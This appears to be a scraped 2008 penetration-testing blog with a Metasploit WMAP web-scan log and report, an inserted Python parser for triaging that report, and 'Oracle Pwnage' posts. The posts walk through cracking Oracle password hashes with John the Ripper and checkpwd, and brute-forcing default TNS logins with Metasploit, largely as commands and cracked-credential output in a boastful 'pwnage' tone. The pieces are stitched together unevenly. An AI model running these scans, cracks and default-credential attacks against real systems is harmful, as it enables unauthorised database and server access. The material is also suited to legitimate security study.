    [*] Error: 192.168.0.100
    [*] Launching auxiliary/scanner/http/frontpage_login WMAP_SERVER against 192.168.0.100:80
    [*] http://192.168.0.100:80/ may not support FrontPage Server Extensions
    [*] Launching auxiliary/scanner/http/version WMAP_SERVER against 192.168.0.100:80
    [*] 192.168.0.100 is running Apache/2.2.3 (CentOS)( Powered by PHP/5.1.6 )
    [*] Launching auxiliary/scanner/http/wmap_vhost_scanner WMAP_SERVER against 192.168.0.100:80
    [*] >> Exception during launch from auxiliary/scanner/http/wmap_vhost_scanner: The following options failed to validate: DOMAIN.
    [*] Launching auxiliary/scanner/http/options WMAP_SERVER against 192.168.0.100:80
    [*] 192.168.0.100 allows GET,HEAD,POST,OPTIONS,TRACE methods
    [*] Launching auxiliary/scanner/http/frontpage WMAP_SERVER against 192.168.0.100:80
    [*] http://192.168.0.100:80 is running Apache/2.2.3 (CentOS)
    [*] FrontPage not found on http://192.168.0.100:80 [404 Not Found]
    [*] Launching auxiliary/scanner/http/wmap_file_same_name_dir WMAP_DIR / against 192.168.0.100:80...
    [-] Blank or default PATH set.
    [*] Launching auxiliary/scanner/http/wmap_file_same_name_dir WMAP_DIR /web/ against 192.168.0.100:80...

    ---SNIP---

    msf > wmap_reports
    [*] Usage: wmap_reports [options]
    -h Display this help text
    -p Print all available reports
    -s [id] Select report for display


    Show available reports.

    msf > wmap_reports -p
    [*] Id. Created Target (host,port,ssl)

    1. Sat Nov 22 22:37:04 -0500 2008 192.168.0.100,80,0

    [*] Done.


    Show your report.

    msf > wmap_reports -s 1
    WMAP REPORT: 192.168.0.100,80,0 Metasploit WMAP Report [Sat Nov 22 22:37:04 -0500 2008]
    WEB_SERVER TYPE: Apache/2.2.3 (CentOS) ( Powered by PHP/5.1.6 ) [Sat Nov 22 22:37:06 -0500 2008]
    WEB_SERVER OPTIONS: GET,HEAD,POST,OPTIONS,TRACE [Sat Nov 22 22:37:07 -0500 2008]
    DIRECTORY NAME: /admin/ Directory /admin/ found. [Sat Nov 22 22:50:50 -0500 2008]
    DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:50:50 -0500 2008]
    DIRECTORY NAME: /administrator/ Directory /administrator/ found. [Sat Nov 22 22:51:14 -0500 2008]
    DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:51:14 -0500 2008]
    DIRECTORY NAME: /cgi-bin/ Directory /cgi-bin/ found. [Sat Nov 22 22:52:13 -0500 2008]
    DIRECTORY RESP_CODE: 403 [Sat Nov 22 22:52:13 -0500 2008]
    DIRECTORY NAME: /class/ Directory /class/ found. [Sat Nov 22 22:52:29 -0500 2008]
    DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:52:29 -0500 2008]
    DIRECTORY NAME: /db/ Directory /db/ found. [Sat Nov 22 22:53:01 -0500 2008]
    DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:53:01 -0500 2008]
    DIRECTORY NAME: /error/ Directory /error/ found. [Sat Nov 22 22:53:31 -0500 2008]
    DIRECTORY RESP_CODE: 403 [Sat Nov 22 22:53:31 -0500 2008]
    DIRECTORY NAME: /icons/ Directory /icons/ found. [Sat Nov 22 22:54:13 -0500 2008]
    DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:54:13 -0500 2008]
    DIRECTORY NAME: /includes/ Directory /includes/ found. [Sat Nov 22 22:54:24 -0500 2008]
    DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:54:24 -0500 2008]
    DIRECTORY NAME: /js/ Directory /js/ found. [Sat Nov 22 22:54:38 -0500 2008]
    DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:54:38 -0500 2008]
    DIRECTORY NAME: /manual/ Directory /manual/ found. [Sat Nov 22 22:55:02 -0500 2008]
    DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:55:02 -0500 2008]
    DIRECTORY NAME: /template/ Directory /template/ found. [Sat Nov 22 22:57:38 -0500 2008]
    DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:57:38 -0500 2008]
    DIRECTORY NAME: /upload/ Directory /upload/ found. [Sat Nov 22 22:57:55 -0500 2008]
    DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:57:55 -0500 2008]
    DIRECTORY NAME: /usage/ Directory /usage/ found. [Sat Nov 22 22:57:57 -0500 2008]
    DIRECTORY RESP_CODE: 403 [Sat Nov 22 22:57:57 -0500 2008]
    DIRECTORY NAME: /web/ Directory /web/ found. [Sat Nov 22 22:58:08 -0500 2008]
    DIRECTORY RESP_CODE: 302 [Sat Nov 22 22:58:08 -0500 2008]
    DIRECTORY NAME: /web/class/ Directory /web/class/ found. [Sat Nov 22 23:00:53 -0500 2008]
    DIRECTORY RESP_CODE: 200 [Sat Nov 22 23:00:53 -0500 2008]
    DIRECTORY NAME: /web/css/ Directory /web/css/ found. [Sat Nov 22 23:01:16 -0500 2008]
    DIRECTORY RESP_CODE: 200 [Sat Nov 22 23:01:16 -0500 2008]
    DIRECTORY NAME: /web/db/ Directory /web/db/ found. [Sat Nov 22 23:01:26 -0500 2008]
    DIRECTORY RESP_CODE: 200 [Sat Nov 22 23:01:26 -0500 2008]
    VULNERABILITY DIR_LISTING: /web/css/ Directory /web/css/ discloses its contents. [Sat Nov 22 23:02:34 -0500 2008]
    VULNERABILITY DIR_LISTING: /web/web/pic/ Directory /web/web/pic/ discloses its contents. [Sat Nov 22 23:02:40 -0500 2008]
    VULNERABILITY PUT_ENABLED: /web/web/ Upload succeeded on /web/web/ [Sat Nov 22 23:03:18 -0500 2008]
    [*] Done.


    Finish your pwnage...errr pentest.
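    A small triage parser for the wmap_reports output shown above, as an added example that is not part of the original post or of WMAP. It pairs each DIRECTORY NAME with its RESP_CODE, ranks the VULNERABILITY lines, and flags TRACE in the allowed methods; the severity table and the constructed excerpt of the report are assumptions.

```python
import re

# Constructed excerpt in the format printed by "wmap_reports -s <id>" above.
SAMPLE_REPORT = """\
WMAP REPORT: 192.168.0.100,80,0 Metasploit WMAP Report [Sat Nov 22 22:37:04 -0500 2008]
WEB_SERVER TYPE: Apache/2.2.3 (CentOS) ( Powered by PHP/5.1.6 ) [Sat Nov 22 22:37:06 -0500 2008]
WEB_SERVER OPTIONS: GET,HEAD,POST,OPTIONS,TRACE [Sat Nov 22 22:37:07 -0500 2008]
DIRECTORY NAME: /admin/ Directory /admin/ found. [Sat Nov 22 22:50:50 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:50:50 -0500 2008]
DIRECTORY NAME: /cgi-bin/ Directory /cgi-bin/ found. [Sat Nov 22 22:52:13 -0500 2008]
DIRECTORY RESP_CODE: 403 [Sat Nov 22 22:52:13 -0500 2008]
DIRECTORY NAME: /web/ Directory /web/ found. [Sat Nov 22 22:58:08 -0500 2008]
DIRECTORY RESP_CODE: 302 [Sat Nov 22 22:58:08 -0500 2008]
VULNERABILITY DIR_LISTING: /web/css/ Directory /web/css/ discloses its contents. [Sat Nov 22 23:02:34 -0500 2008]
VULNERABILITY PUT_ENABLED: /web/web/ Upload succeeded on /web/web/ [Sat Nov 22 23:03:18 -0500 2008]
[*] Done.
"""

# Every report line looks like "<CATEGORY> <KEY>: <body> [<timestamp>]".
LINE_RE = re.compile(r"^(\S+) (\S+): (.*) \[([^\]]*)\]$")

# Assumed ranking of the finding types WMAP emits in this report.
SEVERITY = {"PUT_ENABLED": "high", "DIR_LISTING": "medium"}


def parse_wmap_report(text):
    report = {"target": None, "server": None, "methods": [], "dirs": [], "vulns": []}
    pending_dir = None  # DIRECTORY NAME line waiting for its RESP_CODE line
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # "[*] Done." and other plugin chatter
        category, key, body, _stamp = m.groups()
        if category == "WMAP" and key == "REPORT":
            report["target"] = body.split()[0]
        elif category == "WEB_SERVER" and key == "TYPE":
            report["server"] = body
        elif category == "WEB_SERVER" and key == "OPTIONS":
            report["methods"] = body.split(",")
        elif category == "DIRECTORY" and key == "NAME":
            pending_dir = body.split()[0]
        elif category == "DIRECTORY" and key == "RESP_CODE":
            if pending_dir is None:
                continue  # RESP_CODE without a NAME: malformed, skip rather than mis-pair
            report["dirs"].append((pending_dir, int(body)))
            pending_dir = None
        elif category == "VULNERABILITY":
            path, _, message = body.partition(" ")
            report["vulns"].append({"kind": key, "path": path, "message": message,
                                    "severity": SEVERITY.get(key, "info")})
    # TRACE among the allowed methods is a configuration weakness (cross-site tracing)
    # that the version/options modules reveal but WMAP does not list as a vulnerability.
    if "TRACE" in report["methods"]:
        report["vulns"].append({"kind": "TRACE_ENABLED", "path": "/",
                                "message": "HTTP TRACE method allowed", "severity": "low"})
    return report


def summarize(report):
    """One line per finding, highest severity first, plus the directories that answered 200."""
    order = {"high": 0, "medium": 1, "low": 2, "info": 3}
    vulns = sorted(report["vulns"], key=lambda v: order[v["severity"]])
    lines = ["%s %-13s %s %s" % (v["severity"].upper(), v["kind"], v["path"], v["message"])
             for v in vulns]
    reachable = [d for d, code in report["dirs"] if code == 200]
    lines.append("directories answering 200: %s" % ", ".join(reachable))
    return lines


if __name__ == "__main__":
    print("\n".join(summarize(parse_wmap_report(SAMPLE_REPORT))))
```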

    Oracle Pwnage Part 5 — Password Cracking with JTR

    Thanks to dentonj for pointing out to me there was an Oracle patch for John the Ripper.

    I used the john from this site:
    http://www.banquise.net/misc/patch-john.html
    http://btb.banquise.net/bin/myjohn.tgz

    cg@segfault:~/evil/john/run$ more oraclehashes
    SCOTT:F894844C34402B67
    SYS:E0F3062B9648608A
    SYSTEM:7AD9669C7FE693C1
    DBSNMP:E066D214D5421CCC
    PROD:2E817F456CE5A4EC
    TEST:7A0F2B316C212D67

    cg@segfault:~/evil/john/run$ ./john oraclehashes --wordlist=password.lst
    Loaded 6 password hashes with 6 different salts (Oracle [oracle])
    TIGER (SCOTT)
    DBSNMP (DBSNMP)
    TEST (TEST)
    guesses: 3 time: 0:00:00:00 100% c/s: 133842 trying: ZHONGGUO

    cg@segfault:~/evil/john/run$ ./john --i oraclehashes
    Loaded 3 password hashes with 3 different salts (Oracle [oracle])
    Warning: mixed-case charset, but the current hash type is case-insensitive;
    some candidate passwords may be unnecessarily tried more than once.
    PROD (PROD)
    ...


    Oracle Pwnage with the Metasploit Oracle Modules Part 4

    Thank MC for this one...

    http://metasploit.com/users/mc/oracle9i/brute_login.rb

    msf > use auxiliary/admin/oracle/brute_login
    msf auxiliary(brute_login) > set RHOST 172.16.102.130

    RHOST => 172.16.102.130

    msf auxiliary(brute_login) > info


    Name: Oracle bruteforcer for known default accounts.

    Version: $Revision:$


    Provided by:
    MC


    Basic options:

    Name Current Setting Required Description
    ---- --------------- -------- -----------
    RHOST 172.16.102.130 yes The Oracle host.
    RPORT 1521 yes The TNS port.
    SID DEMO yes The sid to authenticate with.


    Description:

    This module uses a list of well known authentication credentials for
    bruteforcing the TNS service.

    msf auxiliary(brute_login) > set SID unbreakable

    SID => unbreakable

    msf auxiliary(brute_login) > run

    [*] Found user/pass of: DBSNMP/DBSNMP...
    [*] Found user/pass of: SCOTT/TIGER...
    [*] Auxiliary module execution completed
    msf auxiliary(brute_login) >

    Metasploit Adobe util.printf() Client-side Exploit Video

    A little video on using the fileformat mixin to exploit the adobe util.printf() vulnerability.

    Sorry, no audio. You'll just have to follow along.


    Metasploit adobe util.printf() client-side exploit from carnal0wnage on Vimeo.

    **P.S. something is jacked on Vimeo and the video is playing 2x too fast. Start the vid, pull the slider back to the beginning and hit play again and it should play at the proper speed. You can also click the link below the video for a bigger view.

    Oracle Pwnage Part 3

    Sorry no metasploit for this one.

    But

    I did get asked how to get the SCOTT/TIGER username and pass. I left a (hint) in the first blog post. But by request here is the link:
    http://www.petefinnigan.com/default/default_password_checker.htm

    The second thing was that you may find yourself with some Oracle hashes after some crafty (well, not really) SQL queries. Something that probably looks like this:

    [*] DBSNMP,E066D214D5421CCC
    [*] SCOTT,F894844C34402B67
    [*] XDB,88D8364765FCE6AF

    There are a couple of crackers, but I like checkpwd from red-database security. http://www.red-database-security.com/software/checkpwd.html

    cg@segfault:~/Desktop/oracle_checkpwd_big$ wine checkpwd.exe DBSNMP:E066D214D5421CCC password_file.txt
    Checkpwd 1.23 [Win] - (c) 2005-2007 by Red-Database-Security GmbH
    Oracle Security Consulting, Security Audits & Security Trainings
    http://www.red-database-security.com

    opening weak password list file
    reading weak passwords list
    checking passwords
    Starting 2 threads
    DBSNMP has weak password DBSNMP

    Done. Summary:
    Passwords checked : 2
    Weak passwords found : 1
    Elapsed time (min:sec) : 0:02
    Passwords / second : 1

    cg@segfault:~/Desktop/oracle_checkpwd_big$ wine checkpwd.exe SCOTT:F894844C34402B67 password_file.txt
    Checkpwd 1.23 [Win] - (c) 2005-2007 by Red-Database-Security GmbH
    Oracle Security Consulting, Security Audits & Security Trainings
    http://www.red-database-security.com

    opening weak password list file
    reading weak passwords list
    checking passwords
    Starting 2 threads
    SCOTT has weak password TIGER

    Done. Summary:
    Passwords checked : 9
    Weak passwords found : 1
    Elapsed time (min:sec) : 0:02
    Passwords / second : 4.5

    cg@segfault:~/Desktop/oracle_checkpwd_big$ wine checkpwd.exe XDB:88D8364765FCE6AF password_file.txt
    Checkpwd 1.23 [Win] - (c) 2005-2007 by Red-Database-Security GmbH
    Oracle Security Consulting, Security Audits & Security Trainings
    http://www.red-database-security.com

    opening weak password list file
    reading weak passwords list
    checking passwords
    Starting 2 threads
    XDB has weak password CHANGE_ON_INSTALL

    Done. Summary:
    Passwords checked : 3
    Weak passwords found : 1
    Elapsed time (min:sec) : 0:02
    Passwords / second : 1.5